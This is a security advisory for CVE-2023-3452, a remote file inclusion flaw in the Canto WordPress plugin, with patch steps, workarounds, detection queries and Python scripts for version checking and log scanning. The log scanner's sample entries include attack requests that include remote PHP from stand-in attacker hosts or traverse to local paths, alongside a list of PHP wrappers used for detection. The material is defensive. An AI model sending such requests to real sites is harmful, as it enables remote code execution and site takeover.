CVE-2023-3452

9.8 CRITICAL

📋 TL;DR

The Canto plugin for WordPress, in versions up to and including 3.0.4, contains a Remote File Inclusion vulnerability via the 'wp_abspath' parameter: the value is passed to a PHP include without validation. When PHP's allow_url_include is On, an unauthenticated attacker can make the server include and execute a PHP file from an attacker-controlled URL, giving remote code execution and potentially full compromise of the site. Where allow_url_include is Off, the same parameter still allows inclusion of local files. Every WordPress site running a vulnerable Canto plugin version is affected.

💻 Affected Systems

Products:
  • Canto WordPress Plugin
Versions: All versions up to and including 3.0.4
Operating Systems: Any OS running WordPress
Default Config Vulnerable: ⚠️ Yes (plugin side; see notes)
Notes: Remote inclusion additionally requires PHP's allow_url_include to be On. It is Off by default and has been deprecated since PHP 7.4, but it is still enabled on some shared and legacy hosts. With it Off, the unvalidated include degrades to Local File Inclusion: an attacker who can place a file containing PHP code on the server by another route (an upload feature, log poisoning, a writable temp directory) can still reach code execution that way.

📦 What is this software?

Canto is a cloud digital asset management (DAM) service. The Canto plugin for WordPress connects a site to a Canto library so that editors can browse the library and insert its images and other assets into posts and pages from the WordPress editor.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete server takeover with remote code execution, data exfiltration, backdoor installation, and lateral movement within the network.

🟠

Likely Case

Website defacement, data theft, malware distribution, or cryptocurrency mining due to the ease of unauthenticated exploitation.

🟢

If Mitigated

Limited impact where allow_url_include is Off: remote inclusion fails outright, but Local File Inclusion remains possible if the attacker can get a file containing PHP code onto the filesystem by another route.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation is straightforward with publicly available proof-of-concept code. Remote File Inclusion requires specific PHP configuration (allow_url_include enabled).

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.0.5 and later

Vendor Fix (plugin changeset for tree.php): https://plugins.trac.wordpress.org/changeset/2951888/canto/trunk/includes/lib/tree.php

Restart Required: No

Instructions:

1. Log into the WordPress admin panel.
2. Navigate to Plugins → Installed Plugins.
3. Find the Canto plugin and update it to version 3.0.5 or later.
4. Alternatively, download the latest version from the WordPress plugin repository and replace the existing plugin files.

🔧 Temporary Workarounds

Disable allow_url_include in PHP

all

Prevents remote inclusion: with the directive Off, include and require refuse URL-style wrappers (http://, ftp://, data:, php://input), so the attacker's file is never fetched. It does not stop inclusion of local files.

Edit php.ini: allow_url_include = Off
Or add to .htaccess: php_flag allow_url_include off

The .htaccess form works only under Apache with mod_php and where the host permits per-directory PHP overrides; under PHP-FPM or Nginx set it in php.ini or in the FPM pool configuration (php_admin_flag) and reload PHP. Confirm the effective value afterwards with php -i or a phpinfo() page rather than trusting the file edit, since a per-host override can differ from the master value.

Disable or remove Canto plugin

linux

Immediately removes the vulnerable component while planning permanent fix.

wp plugin deactivate canto
wp plugin delete canto

🧯 If You Can't Patch

  • Implement WAF rules that block any request carrying a wp_abspath parameter, in the query string and in POST bodies, matched case-insensitively after URL decoding
  • Block outbound HTTP, HTTPS and FTP from the web server process to the Internet: remote inclusion needs the server to fetch the attacker's file, so egress filtering defeats it even where allow_url_include is On
  • Restrict network access to affected systems and enforce strict file upload controls so that local inclusion has nothing attacker-controlled to include

🔍 How to Verify

Check if Vulnerable:

Check the WordPress admin panel → Plugins → Installed Plugins for the Canto version. If it is 3.0.4 or lower, the site is vulnerable. Check the PHP setting as well: with allow_url_include On the flaw is remotely exploitable with no further precondition; with it Off, local inclusion remains.

Check Version:

wp plugin list --name=canto --field=version

Verify Fix Applied:

Confirm Canto plugin version is 3.0.5 or higher in WordPress admin panel.
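To make the version check robust (plain string comparison gets '3.0.10' versus '3.0.5' wrong) and to fold in the PHP setting that decides whether the bug is remotely exploitable, the following is an added example; it is not code from the advisory or from the Canto plugin. It assumes you can read the plugin's main PHP file (WordPress plugin headers carry a 'Version:' line) and the output of php -i; the sample header and php -i lines below are constructed.

```python
import re
from typing import Optional, Tuple

# First fixed release per the advisory.
FIXED_VERSION = "3.0.5"


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '3.0.4' or '3.0.10' into a tuple of ints for comparison.
    Plain string comparison is wrong here: '3.0.10' < '3.0.5' lexically."""
    parts = []
    for piece in re.split(r"[.\-]", version.strip()):
        m = re.match(r"\d+", piece)
        parts.append(int(m.group(0)) if m else 0)
    return tuple(parts)


def version_is_vulnerable(version: str, fixed: str = FIXED_VERSION) -> bool:
    """True when version < fixed, padding so '3.0' compares as '3.0.0'."""
    a, b = parse_version(version), parse_version(fixed)
    width = max(len(a), len(b))
    a += (0,) * (width - len(a))
    b += (0,) * (width - len(b))
    return a < b


def plugin_version_from_header(php_source: str) -> Optional[str]:
    """Read the 'Version:' line of a WordPress plugin header comment block."""
    m = re.search(r"^\s*\*?\s*Version:\s*([0-9][0-9A-Za-z.\-]*)", php_source, re.M)
    return m.group(1) if m else None


def allow_url_include_enabled(php_info: str) -> bool:
    """Parse the 'allow_url_include => <local> => <master>' line printed by
    `php -i`; the first value is the effective one for that SAPI/context."""
    m = re.search(r"^allow_url_include\s*=>\s*(\S+)", php_info, re.M)
    return bool(m) and m.group(1).lower() in ("on", "1")


def assess(php_source: str, php_info: str) -> dict:
    """Combine both checks: a vulnerable version is always locally
    includable; remote inclusion additionally needs allow_url_include On."""
    version = plugin_version_from_header(php_source)
    vulnerable = version is not None and version_is_vulnerable(version)
    url_include = allow_url_include_enabled(php_info)
    return {
        "version": version,
        "vulnerable_version": vulnerable,
        "remote_include_possible": vulnerable and url_include,
        "local_include_possible": vulnerable,
    }


# Constructed sample inputs; not copied from a real server.
SAMPLE_PLUGIN_HEADER = """<?php
/**
 * Plugin Name: Canto
 * Version: 3.0.4
 */
"""
SAMPLE_PHP_INFO = "allow_url_fopen => On => On\nallow_url_include => Off => Off\n"

if __name__ == "__main__":
    print(assess(SAMPLE_PLUGIN_HEADER, SAMPLE_PHP_INFO))
```

On a real host, feed assess() the contents of wp-content/plugins/canto/canto.php (or whichever file carries the plugin header) and the output of php -i run as the same PHP binary the web server uses; the CLI and FPM SAPIs can load different ini files, so a CLI result of Off does not by itself prove the web SAPI is safe.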

📡 Detection & Monitoring

Log Indicators:

  • HTTP requests carrying a wp_abspath parameter in the query string or POST body; values beginning with http://, https://, ftp:// or data:, or containing ../, are attack attempts rather than noise
  • Unusual file inclusion attempts in web server logs, in particular repeated requests to PHP files under the Canto plugin directory from a single source
  • PHP error logs showing include()/require() failures that reference remote URLs or non-existent paths (failed probes against hosts where allow_url_include is Off)

Network Indicators:

  • Outbound connections from the web server to unexpected external hosts immediately after a request to the Canto plugin: the PHP process fetching the attacker's file is the remote inclusion itself
  • Unusual HTTP POST requests to Canto plugin endpoints

SIEM Query:

source="web_server_logs" AND (uri="*wp_abspath*" OR uri="*/canto/*") AND (status=200 OR status=500)

Two caveats: the uri match only sees parameters in the query string, so a wp_abspath sent in a POST body needs request-body or WAF logging to be caught; and a substring match also fires on unrelated URIs that merely contain the string (a site search for it, for example), so triage hits by the decoded parameter value rather than alerting on every match.
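An added example, not part of the advisory, that runs the log indicators above against constructed access-log lines: it parses combined-format entries, looks for a wp_abspath parameter case-insensitively after percent-decoding (including double-encoded names and values), and classifies the value as a remote wrapper or a local path. The tree.php request path, the client addresses and the attacker hostnames are assumptions for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined/common log format: client ident user [time] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)
PARAM = "wp_abspath"
# Wrappers that turn an include into a fetch of attacker-controlled content.
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "ftps://", "data:", "php://input", "expect://")


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable so double-encoded payloads are seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_value(value: str) -> str:
    """'remote' for URL wrappers, 'local' for filesystem paths, else 'other'."""
    v = fully_decode(value).lower()
    if v.startswith(REMOTE_PREFIXES):
        return "remote"
    if ".." in v or v.startswith("/") or re.match(r"^[a-z]:[\\/]", v):
        return "local"
    return "other"


def scan_line(line: str):
    """Return a finding dict for a request carrying the parameter, else None.
    Only the query string is visible in an access log; parameters sent in a
    POST body need request-body or WAF logging."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    values = []
    # parse_qs decodes once; decode keys again so an encoded name still matches.
    for key, vals in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        if fully_decode(key).lower() == PARAM:
            values.extend(vals)
    if not values:
        return None
    value = fully_decode(values[0])
    return {
        "ip": m.group("ip"),
        "status": int(m.group("status")),
        "path": urlsplit(target).path,
        "value": value,
        "kind": classify_value(value),
    }


def scan_log(lines):
    """Run scan_line over every line and keep the findings."""
    return [hit for hit in map(scan_line, lines) if hit]


# Constructed sample log lines (addresses, hostnames and the request path are illustrative).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jul/2023:12:01:02 +0000] "GET /wp-content/plugins/canto/includes/lib/tree.php?wp_abspath=http://attacker.example/s HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Jul/2023:12:01:03 +0000] "GET /wp-content/plugins/canto/includes/lib/tree.php?WP_ABSPATH=..%2F..%2F..%2F..%2Ftmp%2Fx HTTP/1.1" 500 0',
    '198.51.100.7 - - [10/Jul/2023:12:02:00 +0000] "GET /?s=wp_abspath HTTP/1.1" 200 10240',
    '198.51.100.9 - - [10/Jul/2023:12:03:00 +0000] "GET /wp-content/plugins/canto/includes/lib/tree.php?wp%5Fabspath=%2568ttp%253A%252F%252Fevil.example%252Fx HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The third sample line is the false positive a plain substring rule produces: the string wp_abspath appears in the URI as a search term, not as a parameter name, and the parser correctly ignores it. The fourth line shows why decoding matters: both the parameter name and the URL were percent-encoded twice, which a literal match on wp_abspath=http would miss.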
